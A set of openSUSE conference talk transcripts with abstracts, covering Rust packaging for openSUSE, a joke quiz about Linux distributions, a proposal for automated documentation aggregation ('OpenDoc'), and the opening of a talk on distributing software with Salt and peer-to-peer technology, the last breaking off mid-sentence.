we can pass in the cheap to that method and it's just going to work. And this is all more similar to C++ templates than C++ classes in the sense that this is all derived at compile time as well. So at compile time, it's figuring out which method to actually call for the animal in question. So the way you would use this is that you would create a variable like this. And here you can see a little bit of the type inference in Rust where it's figuring out that it needs to actually call the function that creates the cheap because the variable that we're assigning it to has the type cheap. So that's a little bit tricky. So it actually goes the other way. So in previous examples, like here, for example, we have a defined type of an obvious. So we have some memory of a certain type. And then we just say, okay, let the variable point be that type. And then the compiler figures out, okay, so this is type point, then this also has to have that type. But in this case, it's actually going in the other direction. So it's saying, okay, we have a generic function here that creates animals. And we're assigning it to a variable of a specific type. Then that generic function must actually be the cheap constructor. And so it can go in that direction as well. All right. So I also put up, so this is the definition of println macro. So the macros are basically compiler plugins. So what this does is it says, when it sees the println macro, it passes the expression that the macro was passed to this code, which is then at compile time replaced. So, and the difference between this and just having a function is that this is all done at compile time. So you can do, so here it's actually calling print and concat when compiling. So at runtime, the result is just a string constant. If you're used to using something like Ruby or Python or another language like this, that's just total nonsense because there is no compile or runtime in the same sense. But if you're coming from C or C++, then there is an actual difference. The code execution in these macros happen when compiling the code, not when actually running the program. So I think for learning Rust in the beginning, you don't really have to use macros at all. It's more a neat feature later on, I guess. So some of my favorite things about Rust so far is the match and iflet, which is pattern matching. So this is something from Prolog and also Erlang, I think has a lot of this, but it's also coming into other languages where you at compile time say, okay, I'm returning either this or that from this function. And the compiler can check that I'm actually handling all the cases. So in Rust, there is no null at all. So instead, functions can return optional values. So you will return, oh, it's either this object or it's nothing. And at compile time, we will check that you actually made sure that you got what you expected. So there's no way to write code that is null unsafe in that sense. Yeah, traits I talked about. And then the next thing is cargo, which is the package manager for Rust. And I know Lars is now looking at me like I'm crazy because we already discussed the pains of package managers in languages. But cargo is quite nice. And yeah, I'll get into the problems of it for us as open source people later. So cargo is a tool that helps with using libraries and setting up projects. So instead of using the Rust compiler directly, you can use cargo to manage your project. So the way you will create a new project for our little hello code that I showed in the beginning is that you will call cargo new hello and it will create a Git repository for your project and create a little main function for it and everything. And set everything up so you can compile a binary from that. And the main definition of a cargo project is the cargo.toml file. Toml is like in the file similar format where you would define the name of your project, the author name, the version of this project, and then all the dependencies of this project. And also if it produces a library, you would define that here as well instead of a binary. And then to compile, you just run cargo build and it takes care of compiling if it's necessary. And so on. So that's quite nice. In together with cargo, there is something called crates which is the packages for Rust. So there is crates.io which is like a package hub just like for other languages. And the way you would use it is in your cargo.toml, you define dependencies. So let's say we use the random module for random number generation. We would define the version we need and the dependency. And then we use cargo build and it magically, incredibly, just goes out on the Internet, finds random and all the dependencies for it, downloads, compiles, great. So yeah. Okay. So now I'm getting into the problems with this and where we are at right now. So currently the people contributing to the Rust packaging on OpenSusie are this list. I think actually there are some more people who got involved since I wrote this. But the main guy is Mikal. I don't know if you're here. Oh, great. All right. I'll talk to you later. So he's done most of the work in getting the compiler up to date and getting cargo in there and so on. But there is still a lot of work remaining. So currently we have two main projects under DevLanguage. There is the Rust compiler and there is cargo bootstrap, which is the cargo compiler thing. And the reason it's called cargo bootstrap is because it's not quite building itself in the right way yet. We're using Python project created by some Debian guys to build cargo without cargo. Because the problem is that the Rust compiler is written in Rust. So to compile the Rust compiler, you need the Rust compiler. And cargo uses cargo to build itself. So to build cargo, you need cargo. And figuring this out is not that easy. Right now my goal is to get the Rust compiler at least into Tumbleweed by Rust version 1.10 because they made a big important change in their policies as of Rust 1.9, which is that they promised that Rust 1.10 will be able to build itself using Rust 1.9 and so on. So if we have, if we manage to package Rust 1.9, we can then use our packaged Rust version to build Rust 1.10. And by that point, we're bootstrapped and up and going so we can push it into Tumbleweed and remove the binary package for Rust 1.9. And when Rust 1.11 is released, we can rebuild it with our 1.10 package. So this is very similar to the way you would have to package GCC from the beginning. So it's kind of a GCC is written in C, so you need a C compiler to compile GCC. So you have the same problem there. It's just, it's a little bit trickier than it might seem to actually figure out how to do this correctly. Yeah, so that's that. Cargo is even worse because cargo is a cargo project with a long list of dependencies. So to build the initial version of cargo, we need to have like a fake cargo, which, or a binary package of cargo, which we can use to build that version of cargo. And we need to get like the package management up and running to get this working. So this is the kind of the point where we are at now. And this is the point after that where we haven't even gotten to. So my idea for the future is that we will combine kind of the approaches of the Golang packaging stuff that the people, I think it's Marguerite Su of the project that has done most of that work for Golang to package Go modules as RPMs and combine a little bit of how the Ruby stuff is managed using gem to RPM, which is quite nice. And I've started working on that. There's in my home project, there's something called cargo packaging, which doesn't work at all right now. But that's kind of the point of where I'm at right now at looking at packaging Rust and getting into open Su. So that's, yeah, then beyond this, there are a lot of unsolved issues with actually using Rust and getting it into Slee, for example. So there is no stable ABI for Rust itself, for example, which means that if you compile your Rust program with a certain version of the Rust compiler, that comes with a certain standard library. And if you update your Rust compiler, you have to recompile your program. Otherwise, it won't link correctly if you use dynamic linking. So right now, we're limited to static linking, like building everything into one binary, which is not great for security updates and so on. The other problem is that the compilation of Rust itself and Rust programs is extremely slow and memory intense. So to compile the Rust compiler, we need at least eight gigabytes of RAM. And right now, I think the VM is defined to have 50 gigabytes of disk, and that's actually failing sometimes because it runs out of disk anyway. And I don't even understand why, how it can possibly use 50 gigabytes of temporary memory while building the compiler. But yeah, there we are. And it also, right now, it needs its own custom version of LLVM to build a Rust, because Rust is based on LLVM, and they have some patches to LLVM. So that's another issue, we can't just use the LLVM, which is already packaged for Open Susub. We actually have to build LLVM again, just for us. So those are issues that are remaining to be solved. Like the ABI problem is something that we can't solve. We have to wait for the Rust community or do it there. But it's also one of the problems that I think is really difficult to solve. And the problem is that it's really only a problem for us as distributions. So it's only a problem for Red Hat and Suzie and a few other people. For POSILLA, for example, they don't care about static linking. They just static link and it works for them. So that's one of the issues we have. So my main point is please help in packaging Rust. If any of the people who were involved in packaging, Gold packages, for example, or Ruby for Open Susub want to get involved in helping out with Rust, that would be great. Because I think as far as I know, both me and Michala don't really know that much about it. About RPM macros, and this is all magic to us. We just want to get the compiler working. So any help you can give us, that would be fantastic. Any questions? Yes, the other microphone. When do you expect to be able to do the bootstrap of Rust then so that you can do the continuous updates, etc.? So 1.9 has been released now a few weeks ago. And they're on a six-week release schedule. So the next version of Rust will be 1.10, which will be released sometime in July, I think. I'm hoping to have at least the Rust compiler ready to submit or hopefully accepted into Tumbleweed by that time, that's my hope. All right, thank you. Oh, another question. Are there already some bigger software written in Rust? Yes, so there is... So the biggest project right now is the Cervo browser, which is being built by Mozilla. So this is the next version of Firefox, where next means not the next version, but sometime far, far in the future. So it's a whole new browser. I think they've gotten pretty far in standards compliance and so on, but when it comes to actual browser features, they still have a long way to go. There is also, I know, there is something called Habitat, I think, which is developed by the Chef people, people who make Chef, which is a part of Chef somehow, which is written in Rust. I don't know exactly, I don't know anything about it, and I may have gotten the actual projects and details wrong. I think there are a few other, like, big projects, but not anything very open. Like there are big companies using it, but they haven't released anything publicly. But there is a lot of interest in Rust. I mean, it's still a very new language, it's still being heavily developed. So I mean, if we're going to develop something for production today, I probably wouldn't use Rust right now, but soon I think it will be usable. Yeah. All right. Yeah. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thanks, sir. Thanks a lot.
This talk will be a short introduction to the Rust programming language, why it is useful and why you would want to use it. Then I will discuss the current state of Rust in openSUSE, what the situation is regarding packaging crates and what remains to be done.
10.5446/54599 (DOI)
I'm five minutes behind my schedule. And I have ten minutes for this talk. Here we go. I'm Markus Falkner. Some of you may know me. I'm the team leader of the Susie documentation team. And all of this applies if you want to have the story behind any one of these lines. Please come up to me and for a beer I may tell you the story. We'll have a little, I have a little distribution quiz for you. And the thing works very simple. I'll give you one sentence, one image, one hint. It's image and words. Do you have to guess the distribution, Wendell or whatever, Linux company or organization is meant. You figure out who, you figure out how this works after two or three slides. And notice it's not meant to be funny. I was a journalist. I'm impartial. And I hope my boss won't fire me after this talk. I think we are quite, we are quite open at Susie. And I hope so. Okay. Let's roll. What distribution is that? Yeah, come on. Arch, who was that? Arch. Okay. Ain't nobody got time to install that. Arch, he gets a, yep. So if you guess right, you get some small swag from this. Yeah. It's done when it's done. It's done when it's done. What this? No? Yay. We have seen the legacy universe. No, that's us. What's Novel Microsoft Attachments? Microfocus. Legacy. What? Two, no. Two of the three companies that bought us don't exist anymore. Who is that? Think about it. That's Susie. Come on. Don't you want swag? Cool. We can't agree upon a name for our distribution. I heard that before. Who said that? Huh? It's somebody said Mandrieva before. Yeah. We own open source.com. Is that like Linux? No, it's not. Okay, it's Red Hat. We change the spelling of our name more often than it has letters. Yay. I can't open your document because my liberal office is still compiling. Yep. You choose who wants. He already has. Give it to us. Our community manager wants to write a book. Ubuntu, yes. Our CEO wants to write a book. You don't know Red Hat, huh? Okay. Our doc team leader wrote three books. Oh, I'm sorry. We are the Microsoft of open source. Maybe. There's more correct answers for that. Ubuntu is also true. Some people say, SUSE is the Microsoft of open source because we have clickable administration. Others say it's Lindos or something like that. Next it took seven years to finish our website. Yes, because of all the compiling. Okay, we've had that before. Who's that? Right. We listen to our community and hence we change the desktop's color. Ubuntu did that. Somebody said, yay. Your grandpa used me. Yeah. Hey, I'll tell you about my Linux. This is true. I'll tell you about it. I mean, I will tell you about it. You don't need to ask. If you're a Windows app user, I will tell you. I have to. What's that? You all right? By the way, how do you spot an art user at a party? You don't have to, he'll tell you. We considered our, that one's hard. I doubt somebody will know that. We considered our Linux a Model T of distros. Then we decided to dub ourselves after a burner. No? Have you ever heard of CrunchBang Linux and Bunsen Labs Linux nowadays? No? Almost done. I once knew a guy who had been using it. He survived. Linux from scratch. We hired a gentle guy and made him head of package management. Who would do something stupid as that? He's got it right? Who was it? Zuzi. We've only been testing this for five years. We can ship it yet. Zuzi. What do you mean testing? Ship it. Yes. That's a short story to that. When I was a journalist, I was not allowed to test satellite 6 server, which they were selling already at that time. Last one. It's a scenery. There's a plane crash. A woman is crying. I thought we need a doctor. This one Linux guy coming on and saying, step aside, ma'am. I am an arch user. Step aside, ma'am. I'm an arch user. I said it. So please contribute to this thing. Send me your suggestions for stupid stuff like that. Thank you very much. And of course, this was not funny.
I assume this will be the last talk I ever give, because after this every one, every single distribution's community will be out to kill me. Ladies and Gentlemen, bring your hatchets! I have collected quotes, sentences and assumptions that speak for themselves. While I am only showing one sentence each slide, the audience will have to guess the distribution that is meant. Be prepared to discuss: Who is the "Microsoft of open source?" Who thinks they own open source? Who was bought twice, while both buyers don't exist anymore? Who has hired a Gentoo guy as head of package management? Who is still compiling Libre Office and can't open a document therefore? What's that distribution with three, four, five names, constantly changeing? Add your own, this Lightning talk is open source, and a call for your ideas and discussion.
10.5446/54600 (DOI)
So, hello everybody and welcome here in this audience and thank you for coming as so many people and hi to all the millions and billions in the different variety of the Internet's out there. I'm Marcus Farner. I'm happy to have you here. Thank you. Thank you. Oh, that's it. That's all I wanted. Goodbye. No. I'm here to present an idea and I am fully aware that this, that I am presenting here is the produce of a lot of talking, quite some beer were involved in fact and quite some ideas are involved and it is, it is nothing that is finished of course. It's just an idea and I am here because we want to hear from you, the open Susie community, what you think about it and if you think this is possible and we are basically we are trying to make something impossible. It's about automating documentation which is impossible and you will see that. Well, I'm here. I'm Marcus Farner. Some of you may know me, I guess. And with me is, I'll tell you about me. With me is Richard Heigl from Hello World. Richard Heigl is an expert in knowledge management and in the course of this talk I will tell you why he is here. I am team leader at Susie for documentation and I am absolutely impartial. I was an open source journalist and that's why I am absolutely neutral. Some people say I am a Linux expert. I wouldn't say no, I'm not. I would say no, I'm not. I have been working with Linux since 1994 and I have quite some other maybe interesting stories to tell. I am a conch diplomat, I'm a priest. I'm a Jedi knight, I'm Encelado citizen number four and I own some property on the moon. And my boss says I'm running through the worst. So that's what I hear from one of my colleagues recently. If you want to know more details about either one of these things, just talk to me and ask me about it. And for the non-German speakers, if you feel any emotions involved with this talk, which I think will be inevitable, just get some hugs for that. So I want this thing, as I said, it's something for discussion. I want to hear, we want to hear what you think about it. All of these next sentences will be, I guess, maybe controversial, more or less. I think open source communities do not write documentation. You can always contradict me, prove the opposite. You think they do? I think, do you think I'm right? Thank you, Jürgen. Next one. Developers want to write code, not documentation. I just said this several. Every open source project needs documentation. And documentation cannot be automated. There's always humans who have to write documentation in the end. Though good software should not need documentation, it should be self-explanatory, proper documentation, resources are essential to attract new users. It's mostly the newbies or the ones who are new to something who need documentation. Tumbleweed is a rolling release. No, yes, it is. And it's moving way too fast to be properly documented. Nobody disagrees? Good. Seems like I did my homework at least a little. Nevertheless, there's a lot of data. We have a lot of information that we are gathering. We have data in this open source of Wiki. We have data in the mailing lists where people discuss solutions and discuss about good or bad solutions to problems. We have stuff even in the build service. The build service has a lot of information about version numbers and more. We have information in forums and release notes and get comments. And there's the documentation that we, the SUSE documentation team, provide. We develop new forms of documentation like the SUSE best practices. So, sort of like modern style how-tos for achieving single tasks with SUSE products. So there's a lot of documentation. And that's not all. That's just what I just, this was the point that out here. It's just a little bit, a little tiny bit of the documentation that is around in open SUSE. And in SUSE, and there's even more with some other projects somewhere out there, anywhere, there's still even more stuff somewhere in other forums outside. So, what? This picture is hanging over here. I thought it was in the other room, so I put this picture here. It says, this ball painting, it says, if what you say is true, the Shaolin and Kogan could be dangerous. And I think this is pretty much what's happening here. We have some, we have five facts and I think it's, there is a solution, there may be a solution to it. Community and documentation are difficult couple. Oops. Wrong. What is it? Jump over. We have a lot of information in a lot of places. I took this picture last week on a longer holiday trip to northern Germany. It's a beautiful beach. It's called the Amber Beach. And if you dig a little bit, on the beach, you'll find quite some worthy stones, some gems. And it's, and that's what it's all about. It's about finding and presenting it. We have lots of information, but we fail in finding and presenting it. And I, and now we come to the last one. The last fact, or the one before last fact, Tumbleweed is changing faster than anybody can document. Oh, really, I don't believe that. We can do better because nothing is written in stone. That's why I want to introduce the idea of OpenDoc. OpenDoc is just the name that I thought about for this project because I think it just fits. And it's sort of, for those, for those among you who know about quantum mechanics, they will understand what this means. It's making the sort of the impossible possible. And therefore you have to split your mind and go, split your mind and go in both ways. It's easy. If you've done it once, it's easy. Think of OpenQA. OpenQA is a success story, and it was invented some years ago to automate a tedious, unwanted task. And that was basically the idea, the role model for what happened in a knowledge management workshop by this Mr. Heigl here. And we were sitting together at SUSE earlier this year. We talked and we had an idea. What if we could just use the concepts that are in OpenQA in a way to help gathering, collecting the input for documentation automatically? Because when you write documentation, you always have to look for the stuff that needs to be documented. You have to spot the stuff that needs to be documented. And you have to find the content. And that's the problem that we have. We have a lot of data, but nobody knows where it is and that it is there. And so what if you could use automated triggers to collect this information, the changes, the news on tumbleweed, that automatically refine them and paste them into a modern dynamic, somewhat semantic portal? It's not about a new tool. And I say that because at SUSE we are very good in tool debates or in Open SUSE also, I think. And we are, it's good to question everything. But what I think of as OpenDoc is just a presentation layer for many other tools. It should be open. It should include an indexing waiting search engine with crawlers that search no matter what helpful new website of SUSE or this tiny little project somewhere would come up with. So like a modern search engine, you just throw in another URL and do some search engine language magic to wait it and have it presented. On top of this crawler that crawls websites, you could have triggers that act like agents and tell the portal, hey, I've got something. Here is something that fits into your criteria. That might be interesting. And this will be, the agents would tell that to the portal. The portal itself shows a list. I put this list in inverted commas because you will understand, after, in about 20 minutes you will know why I put this in inverted commas because this list is not a list, it's not a list, it's not a list, it's not a list. But let's just talk about it as a list. It shows a list of recent changes, problems, questions asked, or topics highly discussed or relevant or whatever. And as I said, this list is not a list, it's not a list. And this is a long slide. I hope you still understand it. I'm sure you do. It's semantics, it's weighted, it's a presentation. For example, like tech clouds, some of you may be familiar with that. This is a list. This is sort of a list, but it's a weighted list because in this list, the term web 2.0 has been searched or read or commented or disapproved in a way more than the other terms. So this is a weighted list. I would call it. I may be wrong, but it's just my naming of it to make it understandable what I think of. We also have colorful tables that compare, for example, one project with the other. In terms of, for example, how many mailing list forum discussions, how old are the versions, how many errors, mistakes are in there, whatever. So that would be a comparison, an easy visual comparison. For example, as we have in web late, some of you may know because I think there's also a talk about web late here. And web late is a tool that has a website, a dashboard, and with one view, you can see that the where document, where translation work needs to be done. For example, we have a, Kivi is 51% translated. You have a different categories with green and red and not done. So with one view, you can see things very much easier and faster than in a real list with numbers and whatever. So this is also a list, but it has some visual component in it. And the best thing is the information is already there. We have the information. So what's a trigger? A trigger could be, as I said, an agent that feeds data into an open doc. It could be any agent. Like, for example, when you have one of our mailing lists, you have this mailing list and there's a discussion going on about the latest version of system deal or whatever, and you have 200 comments, but it's only two people discussing. I would say it needs at least the topic is interesting, how many people are involved, how long is the thread. You could define a trigger that automatically puts an item on the open doc portal if one of these threads gets long enough and if some relevant people that are known as not being trolls or bots are involved. And that could trigger an entry on the portal, for example. Same applies to forums. Or you could be the standard email from OBS from OpenBuild Service telling you about the updates that they have done this week in Tambuid. But it could also be a hashtag in a commit command. If you commit, if you do git commit, just add a hashtag or whatever to your command and that would trigger an entry on the open doc portal. It could be a keyword in the release notes. It could be a special topic or a keyword in mailing list or a forum that you have been searching for. It could be predefined entities and documentation, whatever. It could also be external, like a demon monitoring social networks discussions about a topic. For example, if you're a release manager and there's a discussion going on because your latest version of your software was really messy and there were lots of mistakes inside, you would want to be informed automatically about it. So that's what an agent like that could do. And what we can, what can we get out of this, all of this data collected then aggregated into one portal? Well, something sweet and nice and tasty, I hope. Imagine an automatic and human distillery refining all this information. I have a screenshot here and I think you, Richard, will also talk about Stack Overflow later a little bit. If you know Stack Overflow, you probably already know what I'm talking about. Now, Stack Overflow also presents data in lists, but you can tag, you can vote, you can have the list, have individual views on the list. And lots of information has been, information is entered by humans here, but you can, if you click on hot, you'll have a different list or a different sorting of the same results that are in the system. And by just clicking one to five stars or did that help, whatever, the data gets more helpful to others. So this list should allow and should encourage users to rate, to mark, maybe to kick some topic as not relevant or outdated or even to tag as hot or whatever you could also create relations like this is related to virtualization or whatever. As with Stack Overflow or similar, the stuff that is rated higher will be presented more often, not relevant stuff should go down the list. In this way, and, oh no, sorry, different sentence. That also means you could have individual preferences, individual, an individual approach with your own login or whatever to this portal where you could set different types of lists because you are a user, a developer, release manager, package maintainer or whatever. You may have like your own personalized dashboard. And these criteria that you use could like define relevance for single users for you because you might be different. Different in a way. Some movie fans will have recognized. Like the good, the bad, the ugly. The release managers or developers could use OpenDoc or such a dashboard to find out what's wrong, working good, bad, ugly about their own project. Individual dashboards I've already said that it could also be live tracking of development if OBS or if triggers deliver constantly, constantly deliver data. And it could also be used for analytics like the comparison of projects or tasks like Weblate. We have lots of this stuff. We have lots of the, we have all the data. We also have some websites like that. What I'm talking about is sort of an aggregation, a portal that aggregates that. And at this point, we were talking about, well, how could we, how could this technically work? What could be used as basis for such a portal to fulfill those needs that I talked about? And that is where the knowledge management expert came in. And at this point, I just give, pass the microphone on to Richard because he can tell us and give us some examples about how the Wiki World might help us in that. Hi there. Thank you for being here. So my part in this talk is that I share a few experiences we have made in the Wiki World of the last 10 years because we have seen that there is not only a community, there is, there are thousands of information, there is knowledge sharing. You have unbelievable many sources. And how can we cope with that? And some people would say, okay, yeah, Wiki is something, this is like Wikipedia, it's a bit old fashioned. And I don't think so. Wiki has principles and has shown many ways how we can collaboratively share knowledge and aggregate knowledge and bring people together and bring some structure in this whole process. So what I will do now in this talk are two things. First, I will give you such a few ideas how we can start the process to improve the documentation and how we can automate it. And the second thing is I would show you three websites. They can give, have some ideas what's possible. And this is for the next discussion, I think, could be very interesting. So always if it comes to organize, start a knowledge platform, doesn't matter what it is, for what it is, you have to do a few things. The first thing is you have to answer the question, how do we retrieve knowledge? How do we, can you find knowledge today? So Marcus already said, yes, we need a proper search. That's always the basis. We have many guys out there thinking that a search is everything. A search can do everything. A search can do a lot. And yes, it's true. And I'll show you a few examples that a semantic search and good filters will help us a lot to do that. It's not about, again, it's not about tools today, but this is the experiences we made and this experience and the way we are going and heading to today, even Wikipedia and Wikipedia communities around the world. What is semantic? Maybe just for a few people who don't know what it is. Semantic is a funny word for something. Very easy. You learn how to work with meter data, structured data like the author of an article, expiry dates, build numbers or whatever. And normally you have all these information in the content somewhere hidden and that a search can use it. You must set a markup and say, this is a date and this is an author. And then you can do really great things with that. Another thing I want to mention and really want to emphasize is that if it comes to knowledge, you need unique IDs. Wikipedia offers only one article per topic and works with redirects and that for very, very, very good reasons. So if you see it's like overflow, then you can start any topic you want to. Oh, this is Richard's library. I want to talk about the library of Richard's library page and something on you. Find five places or 10 places discussing the same stuff, documenting the same stuff. And in Wikipedia, you are forced, people are forced to use one page and one article to talk about. And because human beings are not really good in memorizing numbers and data, it's normally an article, an article title. And this is something we have to head for that one thing, if you have some information, some knowledge, you should attribute, you should attach it to one point and then you can start and you will find things much better and your search will find it much easier. The next thing is, okay, how will we collect knowledge? And now you see, you can make it on your own, you have ordinary authors, but you can do a lot of these things together with your tools. You can automate it. So Mark has said already, okay, let's define some triggers. Somewhere out there, there is an important information. This information will come to the new open.platform and will make a new post. Hi, here has something changed. Maybe for somebody is this interesting. Other things, engines can do much better than human beings normally is changing meter data. Oh, that's a new release number. So you don't have to change that in many ways. On many platforms do it once or let it do it your platform. Next thing is, now you need human beings for classification. It's always the same. You can say, okay, this information belongs to another article. You can map it. You can say, okay, there is something similar. There are dependencies. There are other topics and you can rate these information. You can say that it has a high quality or is an important change for us and other people should see it. Things you can do, maybe a bot can do, but normally ordinary people do it, enrich your content, add some screenshots, diagrams, videos, attachment, whatever. So OpenDoc can collect all these things. But it also should make some proposal for us to do. So it can tell us, hey, there are links missing. There are often expired posts. Old and not confirmed pages. That's what they do at Wikipedia. Old and not confirmed pages is a very important thing to make the quality assurance in Wikipedia and Wikipedia similar platforms. References, resources. I will hurry up with that. And the other thing is, okay, you want to stay informed. So an ordinary thing is, which is common, is you can follow a topic. You can follow the category. You have your stream. You have your own task list. All these things is very common. But this should be brought together in the plan. You have different ways to work this, but you should put the right ones. This is the question we have to answer now. Last thing, Wikipedia, it here's to its versioning system. That's often forgotten. It's very, very important that you have control over what has changed. Even if the bot has changed it or your neighbor, it doesn't matter. You have to see what has changed. And maybe you must make some rollbacks to that. So, and last one is, obviously, you must find ways to archive. You must have ways to delete information and knowledge. That's, that are things most people don't see at Wikipedia, but it happens every day. They have a huge process for deleting information and not only deletion discussions, but also automatic forms for, get rid of outdated information. So a few examples. That's the second part. We talked already about Stack Overflow. So I don't want to get too deep into that. I show you three other platforms. One is Shift Lock. That's a customer's project. We realized this year. And I will show you a bit about streaming, about attributions, filters and semantic. Research is about, is a head-resort platform. Quite funny. I love it because of the search there. And Translate Wiki is a translation platform for the Wiki communities and for open source software projects. And they can show us a bit about task lists. Oh, there it is. Okay. Yes. Unfortunately, this is German because it's for a German company. The story behind that is, there's a huge amount of, they have to document a plant somewhere here in Germany. And they have people who are responsible to maintain the plant. And they need a book or they need a list. What should we, what have we done? What is to improve? We have some messages. And the thing is, Shift Book is a Shift Book. So what you see now, this is actually, this is a media Wiki on, in the basis. It has just a different view and another skin. And you see, okay, there are messages from people. Somebody has changed something anywhere. And it doesn't depend if this message is made by a human being or by a botter. So it's just about how it works. And what I want to show you, that's a bit complicated. So let this be, for instance, an article about a library, some Linux library. And then you have a description what it is. This is still a Wiki text. But you can enrich this with metadata, what it is. It has a number, an ID, something else. And you have messages to that build, for instance. So what we have seen at the last page, you see, okay, you can attribute, you can attach this to that. And for instance, I show you why it's semantic. If you are working with semantic, then you mostly, you offer your authors, you make it much easier for them to add it something. Because you say, okay, you have here a free text field. But you have also, if you want to add some data or other stuff, then people shouldn't think about how the logic is behind that you can do it, make it most automatically. So anyway, so now you produce metadata and text and everything. And it makes it possible that you can get some reports. So you can say, okay, give me all messages, whether something went wrong or use or maintenance reports or so. So now let's transform this into the problem we have in an open docs system. It's the same thing. It's the completely same thing. You have an article about a package. And then you have messages around that. You have discussions about it. You have maybe some posts made by the GitHub or somewhere else. And you want to attach this to that topic you're talking about. And this will make it much easier to find for people who are working with that, other person, others, people from the doc team, people from the community, what is going on on this topic. And it makes it much easier for the search to find it because you follow the Vicky way. You have always one unique idea. You know what the name of the problem is. And then you find everything around. Another thing is, no, it's the same window. This is a head or a special page. This is also media Vicky. And there you can search for something typical question for head or is what is about scissors. And then you get some results. You see here these are ordinary articles about scissors. And these are for instance, these are links. These are sources somewhere out in the web. If I would jump to that, then I come to another website. And this website has different categories or tags. And we can an idea behind this platform is to rate this information that you can see, okay, this article has a high quality or is especially for has good images or videos or something from a marshmallow that I know. Again, it's just about the principle. The principle is you have a great, nice search and everything you do, you combine it with good content. And you work in an intelligent way in combining categories, free text, search, and you will find everything very, very quick. You see, this is really quick searching. Yes. And a third one. Ha, no, unfortunately we need this one. Okay, Translate Vicky is an open source translation community. And it works like this. I don't know what to do today. Or maybe I can translate something for an open source community project. So I go to translate Vicky. And there are several projects. And it's the same like the translation tool you showed us before. You see, what's it like? Start it. What if I want to do it for you? I don't know. Sorry, it doesn't work. Okay. I let this, it's about, you go to your page and you see, okay, there are 10, 20 tasks I can do. I have several translations. I open it, take the translation, post it and everything is fine. So I can work as long as I want. And every little thing I do will improve the documentation. So what they do is everything you have to do for this documentation or improving the translation is very small steps, very small packages, no workload. You just control and say, okay, this is fine. This is not fine. And I can do it better. And this is the way I think we should go to is that we make small packages and you can say, oh, is this page outdated? Yes or not? Does it have a screenshot? Yes or not? Do you know better sources? Is this discussion really important? And then you get a great, a really, really, really great documentation. I can promise you. And what we have already at this moment, it's not a technical thing. It's a question about people and the content. Our experience is if you start any web platform, it's always about people and what content you really need because there's a huge amount. But in the end, you need at least 10%. 10% are what you're really, really looking for and the others are interesting. But so for a success story, you need these 10%. And this is what we are discussing today. What is necessary? And if you know what is necessary, then you can organize this very quickly. So I give back to Marcus Fahner. Thank you very much. Thank you, Richard. Okay, I close the presentation. I wanted to close this. So what we are going to do, or this is all, as I said, this is all up to now ideas. I want to put this for discussion. This is for general discussion. The documentation team will provide one person's work for one day per week to help as a gardener inside this. If there is something like an open doc portal one day, I added it as a hack week project for next week. And now here is my presentation again. Let me just see. Can I, yeah, I can jump to the one, let the one. I would like to carry on this, this cut thing, this cut thing, whole thing. So because knowledge sharing is not only a question of technology, it is also a question of people and content. As we have seen, there are many ways where we can get the content from somewhat or semi-automatic systems, but we also need people who do that. And we need to know if this is wanted and if it is feasible for us at all. And therefore, as I already mentioned, we have something in mind like the gardener, which I am already saying that I have the permission to devote one guy, one person of my team for one day a week, some hours of work to refine the results of the triggers. Hopefully, the community would have helped before that by rating, marking, tagging, whatever. But he would work in that because I think that's necessary, separating the weeds from the good, from the flowers. We already started to work on the open-suzer documentation. So Christoph, I think he's not, yeah, here he is. He already started working in the Viki. We have some administrative tasks like moving the Viki, updating, upgrading it and making it a starting place for documentation, for open-suzer documentation. We are working on that. That is already work in progress. But I want to go on, I want to move on with this. I want you, the open-suzer community, to tell me if this is something that is good or that is bad. I want to give this open doc thing for discussion, to put it for discussion for you. And so next week is Hack Week. And therefore, I added this as a Hack Week project. It's the Project 1514. And I hereby invite you to join me, us for that. And that's why now I'm open for discussions. We have a little more time because the next, I know the next speaker quite well. And he promised that he wouldn't start before I leave the stage. So if you have any questions, if you want to tell me that this is total bullshit that I just talked, which I don't think will happen because I had an expert here. Thank you, Richard. So, any questions? Was it that much input? Or was it that stupid? Or both? It needs to settle, huh? So, the next steps would involve, like I said, the Hack Week project or the Hack Week maybe discussions next week. Question? No. Oh, okay. Also waiting. So the next step would involve the Hack Week. Next week, with discussions. And finding out if there is interest in the community in this project. And then we will see. I hope that we can start something and make something here. And have some nice summer months working on that. Maybe something like a summer of documents with having something that we can present at the SuzyCon in November, whatever. Okay. You've had your chance to ask questions. Thank you. Thank you, Richard. No worries.
A suggestion for a new approach to documenation. "Breaking the perception that a rolling release cannot be documented" Forums, mailing lists, wikis, release notes, Git commit comments, QA tools like Open QA and many more: A vast abundance of resources offer indicators for documentation. However the data is neither collected nor structured nor viewed at all, mostly because everybody thinks it's a tedious work. But modern knowledge management tools can collect the data, structure it, add semantic analysis and put it into a format that a community can benefit from - with minimal human input. Imagine a website like Stackoverflow or Reddit, but (open source and company-independent) with automated input, but ranked by interest (views), helpfulness and discussion thread length. The input triggers could become an open project, like Open QA's tests. A "Doc Gardener" could then pick up the most important tasks and move them to openSUSE wiki or Enterprise Documentation, at the same time helping the community and spotting pain points of the community.
10.5446/54601 (DOI)
Can you turn down the light a little, please? Perfect. So hello, everybody. My name is Marcus. You can best reach me by email. I have to think about GitHub for another two months and so forth, and Twitter, or all these things. I work for a big company whose name I won't mention in the recording. You can ask me who that is. And I started about a year ago to convince my superiors to endeavor the possibility to distribute software not the way we've done it before, or we do it. We've done it before. But by using peer-to-peer technology. So this was granted. And since then, I learned how to combine peer-to-peer with salt, and I hope to find your attention. Speaking of you, who has used salt for more than half a year regularly? This is about five out of, one, two, three, five out of, I think it's about 10. Let's say it's 12. Let's say 12 is 10. More people have used it for more than half a year. So half of you are not really deep solters. Who of you uses more than 50 minions? One. Thank you. Are your minions, too? Are your minions agent or agent less? Agents, they have agents, they have agents. And who uses an agent less minion, or an agent, salt SSH or something? Yeah, nearly two. Okay, I don't. You are aware of what it, or those of you who use salt, you are aware of the execution modules, how to write them, of course, we've seen it today. Perfect. Who has actually windows minions? This is exactly one person. I knew it. So here I stop. So most of you use salt for Unix. I don't. I have it only on the salt master. And it works good. There are strange things which are, there are always strange things. It works. It works on windows, so you should try it. Who uses salt for an Apple minion? Again one person. Okay. Who of you uses, this is just for curiosity. Who has used RAID so far? Right, exactly nobody. Me neither. I haven't used RAID so far. On one of the slides, I will come back to the RAID question. So as I said, I distribute software, who of you distribute software to end user work stations or laptops? Kind of two, kind of three. Retail, what does that mean? What? Point of sales or? Okay. Yeah, yeah, I see. Well, yes. So, and how big is your, the software library you have to deploy, like hundreds of megabytes? Yeah, not too big, not exaggerately big. Well, I can just talk for our customers. We have requests for distributing large files, like videos for the digital signage or price list updates or so. So 